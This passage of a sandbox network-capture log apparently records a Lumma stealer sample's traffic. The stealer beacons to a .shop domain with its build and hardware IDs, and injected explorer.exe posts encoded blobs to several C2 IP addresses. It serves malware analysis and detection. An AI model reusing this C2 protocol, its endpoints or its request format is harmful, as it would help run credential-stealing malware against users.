2024-07-27 05:44:57 UTC	808	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:44:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=icjcm0e0944kvm28483d0ia73s; expires=Tue, 19-Nov-2024 23:31:35 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l7%2Bq1U94kzXZdIZr1qG%2FCg8EGLJMghVNxfodAwH%2Bq3H0Vo8szhT%2FfL6l0K2vcZ0D3BQLytEsLI6iVCjqOPBfzCmHsyVGuiWT15VBkxvTUKDiO6cPXQNtqZhklwLerFp16nfsgSjXFYg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a52004e667c78-EWR alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	62312	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:56 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:44:56 UTC	1122	OUT	Data Raw: 6b 2b 56 61 68 61 69 37 35 46 34 7a 65 45 79 57 35 66 2f 6b 71 64 49 35 67 41 74 35 69 32 71 66 2f 46 4b 33 38 4f 34 30 38 71 6f 43 37 37 7a 65 4c 2b 65 59 66 69 62 34 62 71 39 4e 77 78 6e 75 55 34 41 72 55 79 70 31 63 50 7a 69 32 34 39 76 51 64 4d 76 41 41 6b 44 37 6b 72 30 5a 4c 76 73 30 78 63 2f 77 4c 79 43 6f 4b 61 63 41 43 2f 6c 72 58 70 65 49 73 69 70 4a 6b 34 35 4e 73 4b 58 58 33 61 48 34 56 42 6d 34 4a 45 73 57 45 44 45 65 6d 47 61 31 41 68 7a 6d 42 66 66 70 44 44 67 66 70 4b 59 54 64 39 44 77 2f 51 58 4f 67 38 41 56 31 62 36 4f 6d 48 53 43 62 31 55 50 31 38 41 55 74 67 56 4e 78 67 77 67 30 4e 51 51 52 50 33 2b 33 79 53 31 35 6a 7a 38 47 6b 72 41 70 74 5a 2b 6e 78 56 65 42 68 66 4d 75 6d 4d 78 42 33 79 70 48 58 77 36 64 42 49 74 75 64 73 32 77 75 Data Ascii: k+Vahai75F4zeEyW5f/kqdI5gAt5i2qf/FK38O408qoC77zeL+eYfib4bq9NwxnuU4ArUyp1cPzi249vQdMvAAkD7kr0ZLvs0xc/wLyCoKacAC/lrXpeIsipJk45NsKXX3aH4VBm4JEsWEDEemGa1AhzmBffpDDgfpKYTd9Dw/QXOg8AV1b6OmHSCb1UP18AUtgVNxgwg0NQQRP3+3yS15jz8GkrAptZ+nxVeBhfMumMxB3ypHXw6dBItuds2wu
2024-07-27 05:44:57 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:44:57 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:44:57 UTC	685	IN	Data Raw: 65 66 79 52 52 30 6c 6a 33 68 53 43 30 72 6e 37 56 7a 41 30 75 5a 78 79 6f 31 66 56 6e 6d 46 48 70 67 73 75 73 71 32 37 6f 46 66 4d 7a 62 62 6e 67 63 36 70 7a 6d 39 4d 6a 50 55 42 5a 52 67 48 6c 78 48 68 31 36 47 5a 4a 54 6d 42 75 36 7a 75 30 6e 4f 51 36 5a 59 61 62 68 71 72 68 7a 67 47 38 68 59 77 39 73 48 78 44 4a 71 52 58 36 6a 4b 2b 38 54 31 76 59 4e 44 61 55 66 64 71 4f 72 7a 79 6b 6b 6b 59 78 4e 4e 74 6e 77 76 48 54 67 38 54 65 6e 6a 62 49 74 45 6e 56 4b 4e 46 76 65 39 63 71 57 32 61 4d 34 31 6a 71 66 53 37 38 6d 57 63 6b 71 4b 6a 66 71 39 7a 39 4f 72 32 52 63 38 42 4c 48 79 5a 42 6d 4a 6a 54 52 4b 4f 50 53 4d 67 55 6c 4d 52 52 79 67 63 65 43 58 71 2f 5a 79 41 31 38 62 4d 64 55 36 6b 6e 33 48 31 43 53 61 69 6b 52 63 42 45 59 30 62 77 48 62 72 55 43 Data Ascii: efyRR0lj3hSC0rn7VzA0uZxyo1fVnmFHpgsusq27oFfMzbbngc6pzm9MjPUBZRgHlxHh16GZJTmBu6zu0nOQ6ZYabhqrhzgG8hYw9sHxDJqRX6jK+8T1vYNDaUfdqOrzykkkYxNNtnwvHTg8TenjbItEnVKNFve9cqW2aM41jqfS78mWckqKjfq9z9Or2Rc8BLHyZBmJjTRKOPSMgUlMRRygceCXq/ZyA18bMdU6kn3H1CSaikRcBEY0bwHbrUC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	62315	172.67.213.85	443	5724	C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:57 UTC	269	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 77 Host: liernessfornicsa.shop
2024-07-27 05:44:57 UTC	77	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 71 54 6f 59 72 4a 2d 2d 26 6a 3d 26 68 77 69 64 3d 41 41 30 37 31 41 33 36 44 41 34 37 32 41 41 31 38 43 30 45 35 46 37 38 34 45 42 46 38 35 36 42 Data Ascii: act=get_message&ver=4.0&lid=qToYrJ--&j=&hwid=AA071A36DA472AA18C0E5F784EBF856B
2024-07-27 05:44:58 UTC	810	IN	HTTP/1.1 200 OK Date: Sat, 27 Jul 2024 05:44:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=u6frpgrk1ruaoprcnak795qfa0; expires=Tue, 19-Nov-2024 23:31:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NYSRccG9xyGeAbOtPfvCEo8BQKWtnpB0aE%2BTUyXpEI5NGYoqsJspi%2FBT3XBgxQV1245uCrdgrfX%2FeAOcqKlt%2BMEg28FiAHEiyuFcSXFUBKuNmyX%2Fun2ESdlCZU88GN8i65cAPcfy2Hk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a9a52122e997279-EWR alt-svc: h3=":443"; ma=86400
2024-07-27 05:44:58 UTC	54	IN	Data Raw: 33 30 0d 0a 48 37 72 53 48 4d 50 30 50 69 54 30 4a 51 32 6d 65 44 55 55 31 4f 73 5a 68 2b 6d 43 2b 49 66 43 6b 41 6b 65 4e 65 75 69 6c 6f 46 45 35 77 3d 3d 0d 0a Data Ascii: 30H7rSHMP0PiT0JQ2meDUU1OsZh+mC+IfCkAkeNeuiloFE5w==
2024-07-27 05:44:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	62316	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:44:58 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:44:58 UTC	1122	OUT	Data Raw: 63 32 41 4c 6d 4a 73 6d 63 4c 74 70 51 4b 45 6d 70 51 57 65 33 37 34 47 48 75 64 58 48 4e 75 45 4f 77 62 33 41 6c 45 63 46 6c 77 6f 30 50 46 59 55 62 4c 6c 4c 48 79 38 54 31 50 6e 53 58 4e 65 6d 68 56 65 56 6d 46 32 69 4e 39 6f 38 65 78 42 75 32 43 30 65 35 4c 4c 2f 59 42 42 34 32 38 37 30 49 46 64 62 53 44 56 6a 76 50 48 48 7a 79 47 6f 47 70 35 6f 59 39 64 36 57 7a 78 6b 51 57 51 6a 6c 4a 63 55 30 59 34 38 4e 6c 43 72 4f 53 37 2f 35 53 34 32 5a 58 31 63 4f 61 66 74 6b 78 6e 31 77 79 73 31 36 73 55 65 38 38 41 39 58 57 6c 72 70 37 52 32 45 61 33 56 78 72 46 42 47 42 47 4c 72 39 71 4a 48 4a 38 57 33 53 76 57 30 45 73 4d 41 47 31 34 58 71 2b 57 47 6d 61 4b 61 41 77 37 41 68 71 4d 43 53 48 51 50 4e 6b 35 4c 65 56 6f 6e 77 43 6b 78 5a 74 61 71 63 73 46 42 6e Data Ascii: c2ALmJsmcLtpQKEmpQWe374GHudXHNuEOwb3AlEcFlwo0PFYUbLlLHy8T1PnSXNemhVeVmF2iN9o8exBu2C0e5LL/YBB42870IFdbSDVjvPHHzyGoGp5oY9d6WzxkQWQjlJcU0Y48NlCrOS7/5S42ZX1cOaftkxn1wys16sUe88A9XWlrp7R2Ea3VxrFBGBGLr9qJHJ8W3SvW0EsMAG14Xq+WGmaKaAw7AhqMCSHQPNk5LeVonwCkxZtaqcsFBn
2024-07-27 05:45:00 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:00 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:00 UTC	685	IN	Data Raw: 61 41 30 45 71 42 45 66 68 6a 69 52 44 30 7a 6e 31 55 69 57 4c 75 74 6a 2b 69 32 56 30 2b 6b 57 4b 37 41 74 2f 34 30 34 52 6b 37 6c 41 4d 6a 44 6e 66 48 37 6b 64 2f 46 2f 62 74 53 76 30 46 54 41 59 35 67 51 2f 4c 4e 79 51 54 66 48 75 32 35 6a 44 31 77 62 50 56 72 73 6d 38 4c 57 48 52 61 48 33 54 76 2b 6e 42 66 74 77 31 57 44 4b 53 72 35 45 2b 50 56 49 53 64 44 41 79 4f 32 4d 71 43 31 59 44 64 48 63 53 46 6c 2f 58 64 64 72 33 39 73 55 79 6e 45 69 70 4d 46 6f 51 50 69 2f 77 6a 2b 55 46 79 6f 6c 34 59 37 2f 67 46 61 6f 65 54 42 62 32 32 49 33 70 47 67 79 5a 2b 6c 6f 61 4d 4f 52 4d 4a 62 70 44 43 63 63 32 4c 52 72 68 56 63 33 4a 6b 4e 79 45 69 56 38 55 57 37 5a 43 76 35 47 6b 71 6f 30 50 71 51 44 74 57 32 63 46 6a 57 77 6a 39 50 78 41 36 68 30 57 59 6b 79 7a Data Ascii: aA0EqBEfhjiRD0zn1UiWLutj+i2V0+kWK7At/404Rk7lAMjDnfH7kd/F/btSv0FTAY5gQ/LNyQTfHu25jD1wbPVrsm8LWHRaH3Tv+nBftw1WDKSr5E+PVISdDAyO2MqC1YDdHcSFl/Xddr39sUynEipMFoQPi/wj+UFyol4Y7/gFaoeTBb22I3pGgyZ+loaMORMJbpDCcc2LRrhVc3JkNyEiV8UW7ZCv5Gkqo0PqQDtW2cFjWwj9PxA6h0WYkyz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	62318	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:00 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:00 UTC	1122	OUT	Data Raw: 6d 65 41 7a 68 78 69 55 2b 41 64 32 42 38 30 47 39 62 48 45 52 5a 56 7a 43 53 51 6c 44 53 59 50 37 6e 6c 38 52 74 76 4a 4e 6c 6a 75 7a 50 6b 66 51 45 50 76 6e 73 72 31 74 73 52 74 78 2f 68 41 43 44 4a 75 68 39 45 49 36 77 2b 79 30 35 36 42 39 62 63 4d 47 58 72 56 51 56 6c 76 41 6b 51 6f 5a 34 36 38 69 63 65 72 66 41 4e 78 35 57 32 72 55 73 64 6e 50 48 65 65 69 34 35 72 44 57 41 37 41 73 61 52 54 66 2f 69 41 4a 58 66 48 77 66 35 64 5a 6a 61 56 39 4e 48 51 70 4d 51 7a 47 38 39 61 70 30 7a 47 6e 57 6a 30 66 43 31 43 45 65 6d 43 7a 52 4a 45 48 44 6d 72 45 61 6d 49 2b 69 58 49 74 76 4d 6c 6c 75 68 33 59 72 49 43 37 55 6f 31 61 4d 4e 66 56 63 46 32 71 76 30 57 69 56 67 56 56 42 59 4f 51 4d 61 61 57 56 44 39 50 55 59 66 4e 59 39 2b 37 71 68 61 6c 4e 43 70 61 34 Data Ascii: meAzhxiU+Ad2B80G9bHERZVzCSQlDSYP7nl8RtvJNljuzPkfQEPvnsr1tsRtx/hACDJuh9EI6w+y056B9bcMGXrVQVlvAkQoZ468icerfANx5W2rUsdnPHeei45rDWA7AsaRTf/iAJXfHwf5dZjaV9NHQpMQzG89ap0zGnWj0fC1CEemCzRJEHDmrEamI+iXItvMlluh3YrIC7Uo1aMNfVcF2qv0WiVgVVBYOQMaaWVD9PUYfNY9+7qhalNCpa4
2024-07-27 05:45:02 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:02 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:02 UTC	685	IN	Data Raw: 41 32 2b 34 6a 4f 33 36 4b 63 5a 55 4c 4a 35 6f 55 67 5a 52 35 57 53 76 46 33 78 6d 6a 65 45 2f 6b 70 33 57 2f 36 2b 4c 55 47 62 4f 77 68 48 52 61 4d 76 44 37 73 39 57 45 49 37 68 6f 36 51 48 2b 47 4e 5a 6a 55 77 4a 7a 61 62 37 62 38 48 7a 68 30 43 55 7a 5a 2f 66 7a 50 70 4c 4d 54 32 32 42 56 4d 6b 50 2b 4a 66 51 6c 71 2f 32 4e 58 6e 45 35 44 35 31 4f 6c 4b 37 34 66 46 52 72 53 53 65 67 61 57 78 73 6a 32 67 41 4c 31 71 4f 6b 7a 56 6b 30 79 42 4a 4a 72 65 68 43 6e 50 55 44 70 49 64 6e 4d 74 47 6c 6e 52 46 4e 5a 70 63 64 47 46 59 47 50 47 6a 37 74 74 70 79 73 79 51 45 66 34 48 51 33 6b 6e 78 43 6d 69 74 67 6d 73 6d 38 72 31 63 6e 32 77 4e 54 41 6a 43 55 2f 37 6d 75 41 38 4f 63 7a 75 4e 66 56 59 61 76 48 79 35 58 69 45 47 7a 63 4a 52 54 72 6c 41 4f 2f 30 6c Data Ascii: A2+4jO36KcZULJ5oUgZR5WSvF3xmjeE/kp3W/6+LUGbOwhHRaMvD7s9WEI7ho6QH+GNZjUwJzab7b8Hzh0CUzZ/fzPpLMT22BVMkP+JfQlq/2NXnE5D51OlK74fFRrSSegaWxsj2gAL1qOkzVk0yBJJrehCnPUDpIdnMtGlnRFNZpcdGFYGPGj7ttpysyQEf4HQ3knxCmitgmsm8r1cn2wNTAjCU/7muA8OczuNfVYavHy5XiEGzcJRTrlAO/0l

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	62321	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:03 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-27 05:45:03 UTC	1267	OUT	Data Raw: 48 63 58 6a 47 77 31 6f 62 56 76 79 31 33 62 2f 75 55 43 79 4f 77 36 52 6e 57 44 30 5a 69 4f 64 30 65 48 32 67 48 4e 38 48 37 31 2b 75 35 49 62 5a 76 4a 6a 5a 71 42 55 71 52 59 2b 62 4c 70 72 66 68 53 74 68 32 43 53 33 79 44 46 2f 4f 63 37 30 42 55 71 32 54 74 6a 46 4b 41 63 4e 4d 55 7a 78 4b 4e 39 74 78 73 4d 72 52 58 6a 4c 6d 6e 48 58 6e 42 4c 36 51 66 68 71 54 31 45 6a 74 53 56 4c 42 32 4e 49 6c 50 51 68 48 53 75 6e 4a 51 46 4d 49 30 53 2f 4f 37 76 59 68 4e 41 37 48 61 6c 48 73 39 71 68 38 38 4e 47 2f 71 76 37 38 32 74 55 34 45 2b 4a 64 78 69 6f 32 30 70 48 58 57 4e 41 36 34 55 64 32 4c 77 6a 4d 79 4c 50 66 35 52 32 73 59 4f 75 66 69 7a 6a 35 61 46 52 33 73 30 51 66 48 30 68 2f 33 76 4f 52 2b 6f 51 44 33 55 7a 74 66 4b 69 71 2f 66 4f 75 2f 54 74 35 4c Data Ascii: HcXjGw1obVvy13b/uUCyOw6RnWD0ZiOd0eH2gHN8H71+u5IbZvJjZqBUqRY+bLprfhSth2CS3yDF/Oc70BUq2TtjFKAcNMUzxKN9txsMrRXjLmnHXnBL6QfhqT1EjtSVLB2NIlPQhHSunJQFMI0S/O7vYhNA7HalHs9qh88NG/qv782tU4E+Jdxio20pHXWNA64Ud2LwjMyLPf5R2sYOufizj5aFR3s0QfH0h/3vOR+oQD3UztfKiq/fOu/Tt5L
2024-07-27 05:45:03 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:03 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:03 UTC	685	IN	Data Raw: 62 56 50 61 63 35 6f 7a 78 54 4f 31 74 4a 47 44 70 36 56 68 4f 44 67 69 36 4d 4f 2f 42 43 30 65 7a 4f 49 73 67 51 45 4c 5a 44 6d 59 66 46 4b 58 79 6a 77 4a 41 44 51 36 67 45 74 67 68 64 47 35 44 72 67 49 42 50 67 54 30 62 62 47 31 4b 58 6c 43 2b 4a 68 76 36 79 43 51 55 51 2b 53 2b 52 71 52 4f 4d 39 49 53 6c 31 45 31 66 4c 44 4b 50 4e 53 6f 4e 64 70 56 30 6d 78 6d 4b 34 5a 53 51 30 65 67 31 48 43 74 37 65 6f 58 57 67 6a 4d 68 78 4c 4d 71 6a 32 6e 4d 7a 63 4f 67 6b 31 55 59 68 70 56 45 49 66 6b 31 4b 67 7a 37 56 43 33 74 33 65 38 70 63 39 69 34 42 44 36 4b 75 54 72 37 56 4f 64 55 6d 63 68 72 51 75 39 76 66 51 62 62 75 32 71 48 43 45 38 6d 69 61 34 36 37 43 4d 4a 6a 68 32 43 50 7a 64 45 56 57 6b 4f 34 6b 72 54 61 43 37 54 43 4e 42 50 6e 67 47 38 61 49 33 34 Data Ascii: bVPac5ozxTO1tJGDp6VhODgi6MO/BC0ezOIsgQELZDmYfFKXyjwJADQ6gEtghdG5DrgIBPgT0bbG1KXlC+Jhv6yCQUQ+S+RqROM9ISl1E1fLDKPNSoNdpV0mxmK4ZSQ0eg1HCt7eoXWgjMhxLMqj2nMzcOgk1UYhpVEIfk1Kgz7VC3t3e8pc9i4BD6KuTr7VOdUmchrQu9vfQbbu2qHCE8mia467CMJjh2CPzdEVWkO4krTaC7TCNBPngG8aI34

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	62322	107.173.160.137	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:04 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:04 UTC	1122	OUT	Data Raw: 4a 63 4b 4a 76 4d 39 5a 58 37 39 62 4b 59 77 4a 39 6f 63 69 41 51 45 76 49 6f 76 6c 48 52 54 75 72 6e 41 78 63 37 6b 59 35 6d 79 4b 34 62 48 42 2b 71 65 73 63 57 71 62 66 52 58 74 55 68 35 31 4d 45 46 68 43 48 6b 2f 52 33 42 4c 54 43 56 33 35 4a 46 78 45 57 57 62 49 57 4e 48 4a 57 6b 7a 58 44 7a 64 54 4b 78 6c 59 32 63 53 31 54 34 47 32 45 75 2b 73 48 75 36 67 6a 73 51 71 4b 66 52 5a 59 76 37 53 4b 32 34 76 56 6a 4e 31 43 64 48 66 4f 71 78 30 62 76 5a 73 6b 31 4a 71 66 67 76 45 63 31 6b 5a 4c 43 6d 72 6e 72 41 33 6f 43 6b 6f 2b 36 34 49 7a 63 73 79 74 6f 33 30 39 77 48 32 63 4b 7a 34 73 70 4f 4b 4d 59 4b 66 50 68 49 4b 34 4b 39 36 34 64 6a 53 41 55 51 67 69 57 58 34 43 75 56 74 70 75 45 58 35 76 42 47 58 57 4a 2b 57 35 6a 70 32 6d 41 74 76 4d 30 69 59 30 Data Ascii: JcKJvM9ZX79bKYwJ9ociAQEvIovlHRTurnAxc7kY5myK4bHB+qescWqbfRXtUh51MEFhCHk/R3BLTCV35JFxEWWbIWNHJWkzXDzdTKxlY2cS1T4G2Eu+sHu6gjsQqKfRZYv7SK24vVjN1CdHfOqx0bvZsk1JqfgvEc1kZLCmrnrA3oCko+64Izcsyto309wH2cKz4spOKMYKfPhIK4K964djSAUQgiWX4CuVtpuEX5vBGXWJ+W5jp2mAtvM0iY0
2024-07-27 05:45:06 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:05 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:06 UTC	685	IN	Data Raw: 64 77 4c 37 77 6f 53 76 5a 65 58 73 69 31 59 67 79 35 4f 73 33 41 72 4f 78 70 43 51 76 34 74 6c 63 51 39 41 51 54 67 6f 6b 51 34 39 65 6e 75 53 2b 76 46 5a 72 78 52 68 49 4a 67 44 31 55 6b 78 48 59 59 54 73 74 36 2f 6b 37 6a 4a 71 52 71 74 54 59 6d 70 42 55 78 7a 66 45 6f 63 77 36 52 6d 67 4a 35 52 67 65 72 33 35 36 33 47 32 37 4a 48 68 72 6b 2f 74 2b 56 47 45 38 32 34 6b 47 55 75 6b 78 44 71 51 46 4c 55 61 31 4b 42 2f 43 75 5a 70 57 43 41 5a 68 59 4c 4f 75 33 59 6e 30 51 6a 71 53 65 59 6e 77 6c 6d 56 55 69 5a 77 72 51 54 6c 58 51 42 45 52 61 72 4f 75 45 63 44 6e 78 7a 77 6b 4b 30 4c 47 67 68 30 63 66 34 37 77 43 2b 6f 31 38 30 42 31 6a 51 62 67 4f 37 46 50 45 48 47 6c 44 49 62 36 31 67 76 61 53 72 73 31 63 4c 51 45 76 59 64 31 50 79 65 77 57 4d 4b 66 6f Data Ascii: dwL7woSvZeXsi1Ygy5Os3ArOxpCQv4tlcQ9AQTgokQ49enuS+vFZrxRhIJgD1UkxHYYTst6/k7jJqRqtTYmpBUxzfEocw6RmgJ5Rger3563G27JHhrk/t+VGE824kGUukxDqQFLUa1KB/CuZpWCAZhYLOu3Yn0QjqSeYnwlmVUiZwrQTlXQBERarOuEcDnxzwkK0LGgh0cf47wC+o180B1jQbgO7FPEHGlDIb61gvaSrs1cLQEvYd1PyewWMKfo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	62324	107.173.160.139	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:06 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:06 UTC	1122	OUT	Data Raw: 41 51 69 59 53 4c 43 58 6d 33 39 41 4f 67 6d 49 44 56 75 4e 73 63 70 39 4b 68 36 50 64 62 4b 6c 6f 52 68 64 64 6d 38 6b 4c 33 74 78 2b 53 65 5a 69 44 77 73 76 57 69 37 31 78 69 47 5a 65 6f 31 41 2f 39 6e 6b 42 61 6f 74 47 78 67 43 44 34 45 55 76 35 6f 38 44 31 31 76 33 59 70 4d 2f 71 59 37 61 41 66 72 7a 51 6f 71 68 73 57 42 34 65 78 70 31 45 6d 4c 45 71 63 64 5a 64 61 42 41 42 67 6b 63 42 4b 52 69 47 50 5a 66 32 58 63 52 44 42 64 4b 68 79 78 52 51 64 61 64 37 54 39 6b 64 41 59 51 5a 38 46 41 43 63 73 66 49 65 34 36 69 64 70 78 2f 45 58 75 65 6b 78 54 6d 37 62 62 43 72 50 77 75 4f 55 43 41 50 66 6b 6d 32 49 67 63 48 78 33 51 6c 30 76 4e 46 31 32 46 78 45 35 67 44 43 58 59 72 63 61 64 75 37 58 37 4b 52 6a 67 6d 6e 32 6e 6c 70 4b 31 32 74 6a 7a 50 64 75 61 Data Ascii: AQiYSLCXm39AOgmIDVuNscp9Kh6PdbKloRhddm8kL3tx+SeZiDwsvWi71xiGZeo1A/9nkBaotGxgCD4EUv5o8D11v3YpM/qY7aAfrzQoqhsWB4exp1EmLEqcdZdaBABgkcBKRiGPZf2XcRDBdKhyxRQdad7T9kdAYQZ8FACcsfIe46idpx/EXuekxTm7bbCrPwuOUCAPfkm2IgcHx3Ql0vNF12FxE5gDCXYrcadu7X7KRjgmn2nlpK12tjzPdua
2024-07-27 05:45:08 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Sat, 27 Jul 2024 05:45:07 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:45:08 UTC	685	IN	Data Raw: 67 61 77 71 68 73 53 4c 57 72 53 32 5a 33 6b 63 63 37 50 77 63 42 39 67 2b 77 33 36 32 2b 4a 59 47 37 37 48 63 51 6a 4d 47 4d 2b 66 6f 36 4f 71 4a 68 58 56 5a 58 47 42 31 6d 59 35 6c 46 65 68 57 58 48 34 4a 73 46 6b 7a 66 39 6e 58 33 50 62 48 39 55 63 55 32 31 6f 67 34 38 4d 47 2b 49 61 39 41 59 33 49 45 66 6f 75 47 55 69 38 44 2f 46 50 33 71 31 79 77 62 58 4c 46 39 49 54 30 36 46 43 35 2f 50 59 79 67 53 45 2b 43 61 54 4d 79 6f 73 6e 75 35 45 53 58 73 79 6e 2b 57 68 4c 44 65 72 42 30 79 55 72 43 49 6d 46 70 77 46 79 55 66 68 41 54 32 65 77 51 77 4e 2f 6f 36 76 79 44 38 30 76 6e 6c 4b 4a 6d 70 48 6a 34 50 64 46 4c 77 76 51 42 39 75 6d 5a 73 70 52 57 69 6d 71 58 45 4d 65 76 67 2b 67 77 35 61 34 31 55 4d 4a 6e 50 76 4b 47 62 79 69 35 46 53 64 79 69 31 4f 64 Data Ascii: gawqhsSLWrS2Z3kcc7PwcB9g+w362+JYG77HcQjMGM+fo6OqJhXVZXGB1mY5lFehWXH4JsFkzf9nX3PbH9UcU21og48MG+Ia9AY3IEfouGUi8D/FP3q1ywbXLF9IT06FC5/PYygSE+CaTMyosnu5ESXsyn+WhLDerB0yUrCImFpwFyUfhAT2ewQwN/o6vyD80vnlKJmpHj4PdFLwvQB9umZspRWimqXEMevg+gw5a41UMJnPvKGbyi5FSdyi1Od

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	62326	167.235.128.153	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:45:08 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-27 05:45:08 UTC	1122	OUT	Data Raw: 41 69 6c 74 58 74 2b 4f 43 41 42 71 35 34 70 30 75 69 47 4b 4f 4e 79 69 53 45 51 47 6d 45 58 42 33 30 4a 67 4b 62 68 78 58 76 42 59 5a 6c 51 51 54 64 41 6e 77 62 7a 50 63 61 57 45 57 61 34 34 52 56 31 49 2b 7a 74 53 6e 38 75 4e 67 6b 57 43 44 4c 38 38 70 4e 36 53 37 52 34 44 75 68 46 46 51 71 53 2f 6b 55 61 6b 30 71 6b 61 56 6f 6c 44 51 62 35 64 47 65 4d 44 37 64 6b 6f 6a 74 65 42 69 77 4d 39 44 62 30 57 6a 57 52 2b 38 46 39 35 72 68 61 4d 54 6f 67 6d 75 37 75 6e 30 2f 4d 48 36 51 37 39 36 4d 2f 78 53 45 4f 59 6a 42 73 53 72 7a 56 54 72 65 5a 5a 52 59 45 31 7a 5a 63 76 56 4e 2f 2f 44 50 7a 4e 36 37 6f 55 52 65 32 7a 58 4e 2b 6e 50 4e 45 53 35 57 54 4d 62 6a 63 39 69 78 42 4f 49 66 5a 7a 75 70 4e 76 32 38 2b 56 57 79 74 37 4d 70 77 38 50 6c 6a 6b 35 59 6f Data Ascii: 